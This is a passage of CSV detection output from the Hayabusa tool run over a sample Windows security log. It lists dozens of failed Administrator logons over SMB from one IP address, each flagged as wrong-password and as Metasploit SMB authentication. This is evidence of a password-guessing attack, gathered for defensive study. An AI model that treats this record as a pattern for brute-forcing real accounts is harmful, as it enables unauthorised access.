Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d82RRXgSmZdnfa8I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xA3ZWnWc9CoGeKpm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FvSYKi8KvEtnmSbs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IvxXI1u0AwtNHNSU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OFIy6Cps3Rm87Kqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: slL3aPBnZl3lVJst : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O98P1oP3AU4lZp2D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EZZ7wIJNZ0CG7fMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7RhwHCqXQytvcaom : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xumaxbBEMZqL6pPO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ur1yZIwgB3ecNJGw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xAuGcKYRcLe0z3bl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmMi0edfBJ8KoJst : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlnoKbUb9jiqJD7t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hBeWGNkWTSp3nje8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2iwM6jPgNjZ3q5qb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xdkrA9Kwzero8eSk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Tb2ZvuJMxOfsxIT6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PBMBRPdATYpLNmyI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P1CKprAPSw4hgiBB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y8qtzwuGJfQG4XB7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: auOf2GwkoymLh4bC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2YcMYQ4sA2GfMwCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YL1iM6WUtZIjIoTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7ruxdEGdeP3RLqF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZFXBpUJzafGYIggt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MC1K9nNLupH0NuSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6rVfBLm10US9II19 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SBhAVHHtR7lZ1C3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FKuUH8lMELYHibxF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UytgJLBtGRMCf3ar : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yno9399gUI2oBr4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbsqE98qy27Sp0UJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c8RjXtDnXvCXSJ2w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EdRXJJ1RCl8n9bd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8tnwGNp2ncfcBlFL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iGKEloPpd6CtrSlg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LBvHz5iKl0dl97xj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0FPIXCc5FlKMLaL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c7Li2NqHgSIetZka : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MuIRFiXBUqrJeMbx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zxJNU05FkPwhcYxj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TWifHaaBiypAGkKi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9VByeO8vHGSOJK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ns12T94itDDRxYxC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8jplFaHgwrWpFY8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fQ9L626fGZQkNC25 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 